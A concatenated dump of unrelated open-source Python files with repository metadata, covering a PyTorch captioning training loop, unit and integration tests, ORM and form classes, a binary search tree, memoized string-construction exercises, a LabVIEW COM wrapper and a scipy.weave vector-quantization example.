optimizer = optim.Adam(model.parameters(), lr=lr)
criterion = nn.CrossEntropyLoss().to(device)
global_step = 0
# record_graph(writer, model)
for i in range(train_steps):
print('train steps ' + str(i))
for k in tqdm(range(train_steps_size)):
if global_step == 3000:
adjust_learning_rate(optimizer, 0.1)
lr = lr * 0.1
record_scale(writer, lr, global_step, 'lr')
images, encoded_captions, caption_lengths = dataloader.train()
loss = train_step(model, criterion, optimizer, images, encoded_captions, caption_lengths)
record_scale(writer, loss, global_step, 'train/loss')
if global_step % valid_interval == 0:
images, encoded_captions, caption_lengths = dataloader.valid()
loss, alphas, preds, labels, sort_ind = valid_step(model, criterion, images, encoded_captions, caption_lengths)
images = images[sort_ind]
record_scale(writer, loss, global_step, 'valid/loss')
# record_images(writer, images, global_step)
# for t in range(max(caption_lengths).item()):
# record_attention(writer, alphas, t, global_step)
# record_text(writer, preds, global_step, 'valid/preds')
# record_text(writer, labels, global_step, 'valid/labels')
edit_distance = Levenshtein.distance(preds,labels)
normalized_edit_distance = edit_distance / max(len(preds), len(labels))
record_scale(writer, normalized_edit_distance, global_step, 'valid/N.E.D')
if global_step % save_interval == 0:
torch.save(model, save_dir + '/' + str(global_step) + '.pth')
global_step = global_step + 1
writer.close()
| 34.437956 | 127 | 0.67677 |
92a10d1e1b8f68ea355dcdec3ec276875f0648db | 841 | py | Python | chorus/test/test_remover.py | mojaie/chorus | 63cbe4764ab2498b7b1da11a628bec01d03ca012 | [
"MIT"
] | 5 | 2018-03-23T04:56:17.000Z | 2022-03-04T15:54:39.000Z | chorus/test/test_remover.py | mojaie/chorus | 63cbe4764ab2498b7b1da11a628bec01d03ca012 | [
"MIT"
] | 4 | 2017-09-08T02:08:12.000Z | 2018-06-12T00:55:18.000Z | chorus/test/test_remover.py | mojaie/chorus | 63cbe4764ab2498b7b1da11a628bec01d03ca012 | [
"MIT"
] | 6 | 2018-01-22T22:21:20.000Z | 2021-03-25T04:47:11.000Z | #
# (C) 2014-2017 Seiji Matsuoka
# Licensed under the MIT License (MIT)
# http://opensource.org/licenses/MIT
#
import unittest
from chorus import smilessupplier as ss
from chorus import remover
from chorus import v2000reader as reader
from chorus.demo import MOL
class TestRemover(unittest.TestCase):
def test_remove_water(self):
mol = ss.smiles_to_compound("CCO.O.O")
remover.remove_water(mol)
self.assertEqual(len(mol), 3)
def test_remove_salt(self):
mol = ss.smiles_to_compound("CC[O-].[Na+]")
remover.remove_salt(mol)
self.assertEqual(len(mol), 3)
def test_remove_coordinated_metal(self):
mol = reader.mol_from_text(MOL["Cyanocobalamin"])
self.assertEqual(len(mol), 95)
remover.remove_coordinated_metal(mol)
self.assertEqual(len(mol), 94)
| 27.129032 | 57 | 0.6956 |
1796b428e8bcb4326274d76b741b552125ab17bc | 58 | py | Python | variabili_visibilita.py | pieroit/python-base | 5e72854ef94e082a7c0bf757ce231a5031fd4017 | [
"MIT"
] | null | null | null | variabili_visibilita.py | pieroit/python-base | 5e72854ef94e082a7c0bf757ce231a5031fd4017 | [
"MIT"
] | null | null | null | variabili_visibilita.py | pieroit/python-base | 5e72854ef94e082a7c0bf757ce231a5031fd4017 | [
"MIT"
] | null | null | null |
a = 20
i = 0
while i < 10:
i+=1
a = 10
print(a)
| 6.444444 | 13 | 0.413793 |
c2e4582ba40ac299fe954fa7ebeb5e0e4453b2c4 | 294 | py | Python | app/Device.py | krishotte/env_data2 | 379f3bef686e5668019d11351aa4dae4eae05d37 | [
"MIT"
] | null | null | null | app/Device.py | krishotte/env_data2 | 379f3bef686e5668019d11351aa4dae4eae05d37 | [
"MIT"
] | null | null | null | app/Device.py | krishotte/env_data2 | 379f3bef686e5668019d11351aa4dae4eae05d37 | [
"MIT"
] | null | null | null | """Device Model."""
from config.database import Model
from orator.orm import has_many
class Device(Model):
"""Device Model."""
__fillable__ = ['name', 'description']
__timestamps__ = False
@has_many
def datas(self):
from app.Data import Data
return Data
| 18.375 | 42 | 0.64966 |
68a342636471ab0600994896836c5248a5b7539c | 1,539 | py | Python | tests/python/pants_test/engine/test_scheduler_integration.py | revl/pants | 8ad83e4ca80c095d44efceafd8b41e575da39c65 | [
"Apache-2.0"
] | 1 | 2020-06-13T22:01:39.000Z | 2020-06-13T22:01:39.000Z | tests/python/pants_test/engine/test_scheduler_integration.py | revl/pants | 8ad83e4ca80c095d44efceafd8b41e575da39c65 | [
"Apache-2.0"
] | null | null | null | tests/python/pants_test/engine/test_scheduler_integration.py | revl/pants | 8ad83e4ca80c095d44efceafd8b41e575da39c65 | [
"Apache-2.0"
] | 3 | 2020-06-30T08:28:13.000Z | 2021-07-28T09:35:57.000Z | # Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from pathlib import Path
from pants.testutil.pants_run_integration_test import PantsRunIntegrationTest, ensure_daemon
from pants.util.contextutil import temporary_dir
class SchedulerIntegrationTest(PantsRunIntegrationTest):
def test_visualize_to(self):
# Tests usage of the `--native-engine-visualize-to=` option, which triggers background
# visualization of the graph. There are unit tests confirming the content of the rendered
# results.
with temporary_dir() as destdir:
args = [
f"--native-engine-visualize-to={destdir}",
"list",
"examples/src/scala/org/pantsbuild/example/hello/welcome",
]
self.assert_success(self.run_pants(args))
destdir_files = list(Path(destdir).iterdir())
self.assertTrue(len(destdir_files) > 0)
@ensure_daemon
def test_graceful_termination(self):
args = [
"--no-v1",
"--v2",
"list-and-die-for-testing",
"examples/src/scala/org/pantsbuild/example/hello/welcome",
]
pants_result = self.run_pants(args)
self.assert_failure(pants_result)
self.assertEqual(
pants_result.stdout_data,
"examples/src/scala/org/pantsbuild/example/hello/welcome:welcome\n",
)
self.assertEqual(pants_result.returncode, 42)
| 38.475 | 97 | 0.651722 |
048eed96a7e41a0216ca8b49476af346c498cb66 | 556 | py | Python | app/blog/forms.py | RohitKochhar/Django-Website | b83d158bb11eef8b924684c44580a4fb68b2d05c | [
"Apache-2.0"
] | null | null | null | app/blog/forms.py | RohitKochhar/Django-Website | b83d158bb11eef8b924684c44580a4fb68b2d05c | [
"Apache-2.0"
] | 1 | 2020-11-16T14:44:57.000Z | 2020-11-16T14:48:33.000Z | app/blog/forms.py | RohitKochhar/Django-Website | b83d158bb11eef8b924684c44580a4fb68b2d05c | [
"Apache-2.0"
] | null | null | null | from django import forms
class CommentForm(forms.Form):
s_Author = forms.CharField( max_length=60,
widget=forms.TextInput(attrs={
"class":"form-control",
"placeholder": "Your Name"
})
)
s_Body = forms.CharField(widget=forms.Textarea(
attrs={
"class": "form-control",
"placeholder": "Leave a comment!"
})
)
| 32.705882 | 62 | 0.402878 |
92c3d6328bd4d96f49da1794f04445d75bb94df7 | 3,015 | py | Python | DQMOffline/PFTau/python/PFMuonDQMAnalyzer_cfi.py | pasmuss/cmssw | 566f40c323beef46134485a45ea53349f59ae534 | [
"Apache-2.0"
] | null | null | null | DQMOffline/PFTau/python/PFMuonDQMAnalyzer_cfi.py | pasmuss/cmssw | 566f40c323beef46134485a45ea53349f59ae534 | [
"Apache-2.0"
] | null | null | null | DQMOffline/PFTau/python/PFMuonDQMAnalyzer_cfi.py | pasmuss/cmssw | 566f40c323beef46134485a45ea53349f59ae534 | [
"Apache-2.0"
] | null | null | null | import FWCore.ParameterSet.Config as cms
pfMuonDQMAnalyzer = cms.EDAnalyzer("PFMuonDQMAnalyzer",
InputCollection = cms.InputTag('muons'),
MatchCollection = cms.InputTag('gensource'),
BenchmarkLabel = cms.string('PFMuonValidation/PFMuonVsGenMuon'),
deltaRMax = cms.double(0.2),
matchCharge = cms.bool(True),
mode = cms.int32( 1 ),
CreateReferenceHistos = cms.bool(True),
CreateEfficiencyHistos = cms.bool(False),
ptMin = cms.double( 0.0 ), # since pT_reco seem to have this threshold
ptMax = cms.double( 999999 ),
etaMin = cms.double(-2.5),
etaMax = cms.double(2.5),
phiMin = cms.double(-3.14),
phiMax = cms.double(3.14),
# slimmed muons selection
slimmedLikeSelection = cms.bool(True),
ptBase = cms.double(5.0),
ptNotPF = cms.double(3.0),
# Histogram Parameters related to pt
#VariablePtBins = cms.vdouble(0.,1.,2.,5.,10.,20.,50.,100.,200.,400.,1000.),
VariablePtBins = cms.vdouble(0.), # if only one entry PtHistoParameter used
PtHistoParameter = cms.PSet(
switchOn = cms.bool(True),
nBin = cms.int32(60),
xMin = cms.double(0.0),
xMax = cms.double(120.0)
),
DeltaPtHistoParameter = cms.PSet(
switchOn = cms.bool(True),
nBin = cms.int32(100),
xMin = cms.double(-30.0),
xMax = cms.double(30.0)
),
DeltaPtOvPtHistoParameter = cms.PSet(
switchOn = cms.bool(True),
BROn = cms.bool(False), BREtaMin = cms.double(0.0), BREtaMax = cms.double(1.4),
EROn = cms.bool(False), EREtaMin = cms.double(1.6), EREtaMax = cms.double(2.4),
slicingOn = cms.bool(False),
nBin = cms.int32(160), #200
xMin = cms.double(-1.0),
xMax = cms.double(1.0)
),
# Histogram Parameters related to Eta
EtaHistoParameter = cms.PSet(
switchOn = cms.bool(True),
nBin = cms.int32(100),
xMin = cms.double(-5.0),
xMax = cms.double(5.0)
),
DeltaEtaHistoParameter = cms.PSet(
switchOn = cms.bool(True),
nBin = cms.int32(400),
xMin = cms.double(-0.2),
xMax = cms.double(0.2)
),
# Histogram Parameters related to Phi
PhiHistoParameter = cms.PSet(
switchOn = cms.bool(True),
nBin = cms.int32(100),
xMin = cms.double(-3.1416),
xMax = cms.double(3.1416)
),
DeltaPhiHistoParameter = cms.PSet(
switchOn = cms.bool(True),
nBin = cms.int32(400),
xMin = cms.double(-0.2),
xMax = cms.double(0.2)
),
DeltaRHistoParameter = cms.PSet(
switchOn = cms.bool(True),
nBin = cms.int32(150),
xMin = cms.double(0.0),
xMax = cms.double(1.0)
),
# Histogram Parameters related to Charge
ChargeHistoParameter = cms.PSet(
switchOn = cms.bool(False),
nBin = cms.int32(3),
xMin = cms.double(-1.5),
xMax = cms.double(1.5)
)
)
| 35.05814 | 85 | 0.577778 |
45feb8108cf4060a7b531b2b7d368d3f1950adbf | 2,321 | py | Python | binary_search_tree.py | cheungh/python | 8dff6c0cb52f85f23f6fffdb5edb4ac2849ce5ee | [
"MIT"
] | null | null | null | binary_search_tree.py | cheungh/python | 8dff6c0cb52f85f23f6fffdb5edb4ac2849ce5ee | [
"MIT"
] | null | null | null | binary_search_tree.py | cheungh/python | 8dff6c0cb52f85f23f6fffdb5edb4ac2849ce5ee | [
"MIT"
] | null | null | null | class Node:
data = None
right = None
left = None
parent = None
def __init__(self, data, parent=None):
self.data = data
self.parent = parent
def min(self):
node = self
while node.right:
node = node.right
return node
def max(self):
node = self
while node.left:
node = node.left
return node
class BST:
root_node = None
sorted_list = []
def __init__(self, data):
self.root_node = Node(data)
def insert(self, data):
if self.root_node is None:
self.root_node = Node(data)
else:
node = self.root_node
parent_node = None
while node:
# insert to left if data is less than root_node
if data > node.data:
if node.left:
node = node.left
else:
node.left = Node(data, node)
return node.left
break
# insert to left if data is greater than root_node
if data < node.data:
if node.right:
node = node.right
else:
node.right = Node(data, node)
return node.right
return node
def traverse(self, node):
"""
traverse tree
:param node:
:return:
"""
# base case
if node is None:
return
# start from right: smaller
self.traverse(node.right)
# current
self.sorted_list.append(node.data)
# end with left: larger
self.traverse(node.left)
def search(self, node, searched_node):
if node is None:
return False
while node:
if searched_node > node.data:
node = node.left
elif searched_node < node.data:
node = node.right
else:
return node
return False
a = BST(11)
a.insert(9)
a.insert(101)
a.insert(90)
a.insert(70)
a.insert(8)
a.insert(5)
a.insert(4)
a.insert(7)
a.insert(3)
a.traverse(a.root_node)
print a.sorted_list
a_node = a.search(a.root_node, 3)
print a_node.parent.data
| 24.177083 | 66 | 0.490737 |
86e89c1624a26f211bc2ec22c32d4545f49a9907 | 686 | py | Python | test_blood_cells_v4.py | 1xVinniThePuh/Comp_Visision | 251afc59cd86989daca8305bc825e33d01ab37fa | [
"MIT"
] | 2 | 2020-05-05T11:30:27.000Z | 2020-05-05T11:31:42.000Z | test_blood_cells_v4.py | 1xVinniThePuh/Comp_Visision | 251afc59cd86989daca8305bc825e33d01ab37fa | [
"MIT"
] | null | null | null | test_blood_cells_v4.py | 1xVinniThePuh/Comp_Visision | 251afc59cd86989daca8305bc825e33d01ab37fa | [
"MIT"
] | 1 | 2020-05-05T11:37:36.000Z | 2020-05-05T11:37:36.000Z | import cv2
import numpy as np
img = cv2.imread('eroded_10.jpg', 0)
img = cv2.medianBlur(img, 5)
cimg = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)
circles = cv2.HoughCircles(img, cv2.HOUGH_GRADIENT, 1, 20,
param1=50, param2=30, minRadius=0, maxRadius=0)
circles = np.uint16(np.around(circles))
count_cr = 0
for i in circles[0, :]:
count_cr += 1
# draw the outer circle
cv2.circle(cimg, (i[0], i[1]), i[2], (0, 255, 0), 2)
# draw the center of the circle
cv2.circle(cimg, (i[0], i[1]), 2, (0, 0, 255), 3)
print('count_cr = ', count_cr)
cv2.imshow('detected circles', cimg)
cv2.waitKey(0)
cv2.destroyAllWindows()
| 25.407407 | 76 | 0.609329 |
5d4a1e50819646fcebdbc61aa8b3ea7839dbf62a | 303 | py | Python | data/multilingual/Latn.TEM/Mono_12/pdf_to_json_test_Latn.TEM_Mono_12.py | antoinecarme/pdf_to_json_tests | d57a024fde862e698d916a1178f285883d7a3b2f | [
"BSD-3-Clause"
] | 1 | 2021-09-19T19:47:35.000Z | 2021-09-19T19:47:35.000Z | data/multilingual/Latn.TEM/Mono_12/pdf_to_json_test_Latn.TEM_Mono_12.py | antoinecarme/pdf_to_json_tests | d57a024fde862e698d916a1178f285883d7a3b2f | [
"BSD-3-Clause"
] | null | null | null | data/multilingual/Latn.TEM/Mono_12/pdf_to_json_test_Latn.TEM_Mono_12.py | antoinecarme/pdf_to_json_tests | d57a024fde862e698d916a1178f285883d7a3b2f | [
"BSD-3-Clause"
] | null | null | null | import pdf_to_json as p2j
import json
url = "file:data/multilingual/Latn.TEM/Mono_12/udhr_Latn.TEM_Mono_12.pdf"
lConverter = p2j.pdf_to_json.pdf_to_json_converter()
lConverter.mImageHashOnly = True
lDict = lConverter.convert(url)
print(json.dumps(lDict, indent=4, ensure_ascii=False, sort_keys=True))
| 30.3 | 73 | 0.811881 |
7863858a9776e0d023da89d0bafc939f66d2f1fc | 584 | py | Python | install/app_store/tk-framework-desktopserver/v1.3.1/tests/fixtures/config/bundles/test_app/app.py | JoanAzpeitia/lp_sg | e0ee79555e419dd2ae3a5f31e5515b3f40b22a62 | [
"MIT"
] | null | null | null | install/app_store/tk-framework-desktopserver/v1.3.1/tests/fixtures/config/bundles/test_app/app.py | JoanAzpeitia/lp_sg | e0ee79555e419dd2ae3a5f31e5515b3f40b22a62 | [
"MIT"
] | null | null | null | install/app_store/tk-framework-desktopserver/v1.3.1/tests/fixtures/config/bundles/test_app/app.py | JoanAzpeitia/lp_sg | e0ee79555e419dd2ae3a5f31e5515b3f40b22a62 | [
"MIT"
] | 1 | 2020-02-15T10:42:56.000Z | 2020-02-15T10:42:56.000Z | # Copyright (c) 2017 Shotgun Software Inc.
#
# CONFIDENTIAL AND PROPRIETARY
#
# This work is provided "AS IS" and subject to the Shotgun Pipeline Toolkit
# Source Code License included in this distribution package. See LICENSE.
# By accessing, using, copying or modifying this work you indicate your
# agreement to the Shotgun Pipeline Toolkit Source Code License. All rights
# not expressly granted therein are reserved by Shotgun Software Inc.
"""
A dummy app
"""
from sgtk.platform import Application
class TestApp(Application):
def init_app(self):
pass
| 25.391304 | 76 | 0.748288 |
28eca14ebaee409dfd77295fd2785a337c3145b1 | 804 | py | Python | examples/beta_bernoulli_pymc3.py | caosenqi/Edward1 | 85f833d307512a585b85ebc2979445e17191ed81 | [
"Apache-2.0"
] | 1 | 2016-10-22T09:56:50.000Z | 2016-10-22T09:56:50.000Z | examples/beta_bernoulli_pymc3.py | caosenqi/Edward1 | 85f833d307512a585b85ebc2979445e17191ed81 | [
"Apache-2.0"
] | null | null | null | examples/beta_bernoulli_pymc3.py | caosenqi/Edward1 | 85f833d307512a585b85ebc2979445e17191ed81 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
"""
A simple coin flipping example. The model is written in PyMC3.
Inspired by Stan's toy example.
Probability model
Prior: Beta
Likelihood: Bernoulli
Variational model
Likelihood: Mean-field Beta
"""
import edward as ed
import pymc3 as pm
import numpy as np
import theano
from edward.models import PyMC3Model, Variational, Beta
data_shared = theano.shared(np.zeros(1))
with pm.Model() as model:
beta = pm.Beta('beta', 1, 1, transform=None)
out = pm.Bernoulli('data',
beta,
observed=data_shared)
data = ed.Data(np.array([0, 1, 0, 0, 0, 0, 0, 0, 0, 1]))
m = PyMC3Model(model, data_shared)
variational = Variational()
variational.add(Beta())
inference = ed.MFVI(m, variational, data)
inference.run(n_iter=10000)
| 23.647059 | 62 | 0.677861 |
d0454f8bf5afad8d7c381d7e2e4a5faa61a7f182 | 80 | py | Python | tic_toc/__init__.py | nok/tic-toc | c777fe5ce505e483815d4183cb1b0ba04a1461bc | [
"MIT"
] | 1 | 2018-11-26T04:12:35.000Z | 2018-11-26T04:12:35.000Z | tic_toc/__init__.py | nok/tic-toc | c777fe5ce505e483815d4183cb1b0ba04a1461bc | [
"MIT"
] | null | null | null | tic_toc/__init__.py | nok/tic-toc | c777fe5ce505e483815d4183cb1b0ba04a1461bc | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from tic_toc.Timer import Timer
__version__ = '0.1.2'
| 13.333333 | 31 | 0.6375 |
0c45e969e6fe32f17dbdeaef3658d42d0e0565cc | 2,102 | py | Python | TEST/BETAsite/Callout.py | takehuge/PYQUM | bfc9d9b1c2f4246c7aac3a371baaf587c99f8069 | [
"MIT"
] | null | null | null | TEST/BETAsite/Callout.py | takehuge/PYQUM | bfc9d9b1c2f4246c7aac3a371baaf587c99f8069 | [
"MIT"
] | null | null | null | TEST/BETAsite/Callout.py | takehuge/PYQUM | bfc9d9b1c2f4246c7aac3a371baaf587c99f8069 | [
"MIT"
] | null | null | null | # This is a template for calling out other programming platforms other than Python itself
# from ctypes import *
# calling VI using its activeX methods & properties
def Call_VI(VI_name): #None = []
import platform
platinfo = platform.system()
if platinfo is "Windows":
import comtypes.client
# Path to type library.
TypeLibPath = "C:/Program Files (x86)/National Instruments for 8/LabVIEW 2011/resource/labview.tlb"
comtypes.client.GetModule(TypeLibPath)
def wrapper(ctrl_params): # VIPath, ParameterNames, Parameters, Indicators=None
comtypes.CoInitialize()
unpack = VI_name(ctrl_params)
VIPath = unpack['VIPath']
ParameterNames = unpack['ParameterNames']
Parameters = unpack['Parameters']
Indicators = unpack['Indicators']
try:
Application = comtypes.client.CreateObject("LabVIEW.Application.8",...and
None, None, comtypes.gen.LabVIEW._Application)
#Get VI Reference (Application methods)
VirtualInstrument = Application.GetVIReference(VIPath)
#Open VI front panel in hidden mode (VI methods)
VirtualInstrument.OpenFrontPanel(True, 1) # 0 (Invalid), 1 (Standard: Background), 2 (Closed), 3 (Hidden), 4 (Minimized), and 5 (Maximized).
#Call VI
VirtualInstrument.Call(ParameterNames, Parameters) #Classic Control is not supported!
# VirtualInstrument.CloseFrontPanel()
if not Indicators:
data = []
else:
data = [VirtualInstrument.GetControlValue(i) for i in Indicators] # indexed (serialized) data
except:
VirtualInstrument = None
Application = None
raise # rethrow the exception to get the full trace on the console
return data
VirtualInstrument = None
Application = None
return wrapper
else: pass
| 38.218182 | 157 | 0.598002 |
d5de717ed60a896390d7e169af151355680f312b | 2,527 | py | Python | skgenome/tabio/picard.py | jeremy9959/cnvkit | b839a2b323113a7d318d216f61a0ed6657c70ed4 | [
"Apache-2.0"
] | null | null | null | skgenome/tabio/picard.py | jeremy9959/cnvkit | b839a2b323113a7d318d216f61a0ed6657c70ed4 | [
"Apache-2.0"
] | null | null | null | skgenome/tabio/picard.py | jeremy9959/cnvkit | b839a2b323113a7d318d216f61a0ed6657c70ed4 | [
"Apache-2.0"
] | null | null | null | """I/O for formats used by Picard tools.
- Interval list (also used in GATK)
- CalculateHsMetrics PER_TARGET_COVERAGE output
"""
from __future__ import absolute_import, division, print_function
import numpy as np
import pandas as pd
def read_interval(infile):
"""GATK/Picard-compatible interval list format.
Expected tabular columns:
chromosome, start position, end position, strand, gene
Coordinate indexing is from 1.
"""
dframe = pd.read_table(infile,
comment='@', # Skip the SAM header
names=["chromosome", "start", "end", "strand", "gene",
])
dframe["gene"].fillna('-', inplace=True)
dframe["start"] -= 1
return dframe
def read_picard_hs(infile):
"""Picard CalculateHsMetrics PER_TARGET_COVERAGE.
The format is BED-like, but with a header row and the columns::
chrom (str),
start, end, length (int),
name (str),
%gc, mean_coverage, normalized_coverage (float)
"""
dframe = pd.read_table(infile, na_filter=False, dtype={
"chrom": "str",
"start": "int",
"end": "int",
"length": "int",
"name": "str",
"%gc": "float",
"mean_coverage": "float",
"normalized_coverage": "float",
})
dframe.columns = ["chromosome", # chrom
"start", "end", "length",
"gene", # name
"gc", # %gc
"depth", "ratio"]
del dframe["length"]
dframe["start"] -= 1
return dframe
# _____________________________________________________________________
def write_interval(dframe):
dframe = dframe.copy()
dframe["start"] += 1
if "gene" not in dframe:
dframe["gene"] = '-'
if "strand" not in dframe:
dframe["strand"] = "+"
return dframe.loc[:, ["chromosome", "start", "end", "strand", "gene"]]
def write_picard_hs(dframe):
if "depth" in dframe.columns:
coverage = dframe["depth"]
norm = coverage / coverage.mean()
else:
coverage = np.exp2(dframe["log2"])
norm = coverage
return pd.DataFrame.from_items([
("chrom", dframe["chromosome"]),
("start", dframe["start"] + 1),
("end", dframe["end"]),
("length", dframe["end"] - dframe["start"]),
("name", dframe["gene"]),
("%gc", dframe["gc"]),
("mean_coverage", coverage),
("normalized_coverage", norm),
])
| 27.769231 | 81 | 0.556787 |
eeeddda3744c11de4c0cf722e13792136c17ab76 | 5,075 | py | Python | exercises/trees/canConstruct.py | iamnicoj/pythonplay | f847038524c59a5fe658712a2cf4f904ad52401e | [
"MIT"
] | null | null | null | exercises/trees/canConstruct.py | iamnicoj/pythonplay | f847038524c59a5fe658712a2cf4f904ad52401e | [
"MIT"
] | 6 | 2021-03-02T21:28:15.000Z | 2021-03-17T23:35:44.000Z | exercises/trees/canConstruct.py | iamnicoj/pythonplay | f847038524c59a5fe658712a2cf4f904ad52401e | [
"MIT"
] | null | null | null | import copy
def can_construct(target, word_bank):
return _can_construct(target, "", word_bank, {})
def _can_construct(target, concatenated, word_bank, memo):
if memo.get(concatenated, None) is not None:
return memo[concatenated]
if target is None or target == "":
return False
if target == concatenated:
return True
if concatenated != "" and target.find(concatenated,0) != 0:
return False
temp_concatenated = copy.deepcopy(concatenated)
for word in word_bank:
concatenated = temp_concatenated + word
result = _can_construct(target, concatenated, word_bank, memo)
memo[concatenated] = result
if result: return True
return False
# This algorithm can be implemented the other way around
# You can recursively check if each word is a prefix on the target
# then slice it out repitevely until you get an empty string and returnt True. False Otherwise
print(can_construct("",["as", "st", "te"])) # ?
print(can_construct("test",["as", "st", "t"])) # False
print(can_construct("test",["as", "st", "te"])) # True
print(can_construct("test",["as", "s", "e", "blue", "t"])) # True
print(can_construct("testinglikeakinginaworldofmuppets",["as", "s", "e", "blue", "t", "k", "o", "a", "i", "m", "u", "likeaking", "w"])) # False
print(can_construct("eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeef",
['e',
'ee',
'eee',
'eeee',
'eeeee',
'eeeeee',
'eeeeeee',
'eeeeeeee',
'eeeeeeeee',
'eeeeeeeeee',
'eeeeeeeeeee',
'eeeeeeeeeeee',
'eeeeeeeeeeeee',
'eeeeeeeeeeeeee',
'eeeeeeeeeeeeeee',
'eeeeeeeeeeeeeeee'
])) # False
def count_construct(target, word_bank):
return _count_construct(target, word_bank, {})
def _count_construct(target, word_bank, memo):
if memo.get(target) is not None:
return memo.get(target)
if target == '':
return 1
temp_target = copy.deepcopy(target)
result = 0
for word in word_bank:
if target.find(word, 0) == 0:
second_temp_target = temp_target[slice(len(word), len(target))]
result += _count_construct(second_temp_target, word_bank, memo)
memo[target] = result
return result
print('count_construct')
print(count_construct("",["as", "st", "te"])) # ?
print(count_construct("test",["as", "st", "t"])) # False
print(count_construct("test",["as", "st", "te"])) # True
print(count_construct("test",["as", "s", "e", "blue", "t"])) # True
print(count_construct("testinglikeakinginaworldofmuppets",["as", "s", "e", "blue", "t", "k", "o", "a", "i", "m", "u", "likeaking", "w"])) # False
print(count_construct("eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeef",
['e',
'ee',
'eee',
'eeee',
'eeeee',
'eeeeee',
'eeeeeee',
'eeeeeeee',
'eeeeeeeee',
'eeeeeeeeee',
'eeeeeeeeeee',
'eeeeeeeeeeee',
'eeeeeeeeeeeee',
'eeeeeeeeeeeeee',
'eeeeeeeeeeeeeee',
'eeeeeeeeeeeeeeee'
])) # False
def all_construct(target, word_bank):
return _all_construct(target, word_bank, {})
def _all_construct(target, word_bank, memo):
if memo.get(target, None) is not None:
return memo[target]
if target == '':
return [[]]
final_result = []
for word in word_bank:
if target.find(word, 0 ) == 0:
target_copy = copy.deepcopy(target)
target_second_copy = target_copy[slice(len(word), len(target))]
parcial_result = _all_construct(target_second_copy, word_bank, memo)
if len(parcial_result) > 0:
for array in parcial_result:
added_word = copy.deepcopy([word])
added_word.extend(array)
final_result.append(added_word)
memo[target] = final_result
return final_result
print('all_construct')
print(all_construct("",["as", "st", "te"])) # ?
print(all_construct("test",["as", "st", "t"])) # False
print(all_construct("test",["as", "st", "te", "e", "s", "t"])) # True
print(all_construct("test",["as", "s", "e", "blue", "t"])) # True
print(all_construct("testinglikeakinginaworldofmuppets",["as", "s", "e", "blue", "t", "k", "o", "a", "i", "m", "u", "likeaking", "w"])) # False
print(all_construct("eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeef",
['e',
'ee',
'eee',
'eeee',
'eeeee',
'eeeeee',
'eeeeeee',
'eeeeeeee',
'eeeeeeeee',
'eeeeeeeeee',
'eeeeeeeeeee',
'eeeeeeeeeeee',
'eeeeeeeeeeeee',
'eeeeeeeeeeeeee',
'eeeeeeeeeeeeeee',
'eeeeeeeeeeeeeeee'
])) # False
| 32.954545 | 145 | 0.562759 |
c464044f3058ac6567a3a69662e8481bd6a4a060 | 9,322 | py | Python | tools/intogen/runtime/pyenv/lib/python2.7/site-packages/scipy/weave/examples/vq.py | globusgenomics/galaxy | 7caf74d9700057587b3e3434c64e82c5b16540f1 | [
"CC-BY-3.0"
] | 1 | 2021-02-05T13:19:58.000Z | 2021-02-05T13:19:58.000Z | tools/intogen/runtime/pyenv/lib/python2.7/site-packages/scipy/weave/examples/vq.py | globusgenomics/galaxy | 7caf74d9700057587b3e3434c64e82c5b16540f1 | [
"CC-BY-3.0"
] | 1 | 2018-04-15T22:59:15.000Z | 2018-04-15T22:59:15.000Z | tools/intogen/runtime/pyenv/lib/python2.7/site-packages/scipy/weave/examples/vq.py | globusgenomics/galaxy | 7caf74d9700057587b3e3434c64e82c5b16540f1 | [
"CC-BY-3.0"
] | null | null | null | """
"""
from __future__ import absolute_import, print_function
# C:\home\ej\wrk\scipy\weave\examples>python vq.py
# vq with 1000 observation, 10 features and 30 codes fo 100 iterations
# speed in python: 0.150119999647
# [25 29] [ 2.49147266 3.83021032]
# speed in standard c: 0.00710999965668
# [25 29] [ 2.49147266 3.83021032]
# speed up: 21.11
# speed inline/blitz: 0.0186300003529
# [25 29] [ 2.49147272 3.83021021]
# speed up: 8.06
# speed inline/blitz2: 0.00461000084877
# [25 29] [ 2.49147272 3.83021021]
# speed up: 32.56
from numpy import *
import sys
sys.path.insert(0,'..')
import scipy.weave.inline_tools as inline_tools
import scipy.weave.converters as converters
blitz_type_converters = converters.blitz
import scipy.weave.c_spec as c_spec
def vq(obs,code_book):
# make sure we're looking at arrays.
obs = asarray(obs)
code_book = asarray(code_book)
# check for 2d arrays and compatible sizes.
obs_sh = shape(obs)
code_book_sh = shape(code_book)
assert(len(obs_sh) == 2 and len(code_book_sh) == 2)
assert(obs_sh[1] == code_book_sh[1])
type = c_spec.num_to_c_types[obs.typecode()]
# band aid for now.
ar_type = 'PyArray_FLOAT'
code = """
#line 37 "vq.py"
// Use tensor notation.
blitz::Array<%(type)s,2> dist_sq(Ncode_book[0],Nobs[0]);
blitz::firstIndex i;
blitz::secondIndex j;
blitz::thirdIndex k;
dist_sq = sum(pow2(obs(j,k) - code_book(i,k)),k);
// Surely there is a better way to do this...
PyArrayObject* py_code = (PyArrayObject*) PyArray_FromDims(1,&Nobs[0],PyArray_LONG);
blitz::Array<int,1> code((int*)(py_code->data),
blitz::shape(Nobs[0]), blitz::neverDeleteData);
code = minIndex(dist_sq(j,i),j);
PyArrayObject* py_min_dist = (PyArrayObject*) PyArray_FromDims(1,&Nobs[0],PyArray_FLOAT);
blitz::Array<float,1> min_dist((float*)(py_min_dist->data),
blitz::shape(Nobs[0]), blitz::neverDeleteData);
min_dist = sqrt(min(dist_sq(j,i),j));
py::tuple results(2);
results[0] = py_code;
results[1] = py_min_dist;
return_val = results;
""" % locals()
code, distortion = inline_tools.inline(code,['obs','code_book'],
type_converters = blitz_type_converters,
compiler = 'gcc',
verbose = 1)
return code, distortion
def vq2(obs,code_book):
""" doesn't use blitz (except in conversion)
ALSO DOES NOT HANDLE STRIDED ARRAYS CORRECTLY
"""
# make sure we're looking at arrays.
obs = asarray(obs)
code_book = asarray(code_book)
# check for 2d arrays and compatible sizes.
obs_sh = shape(obs)
code_book_sh = shape(code_book)
assert(len(obs_sh) == 2 and len(code_book_sh) == 2)
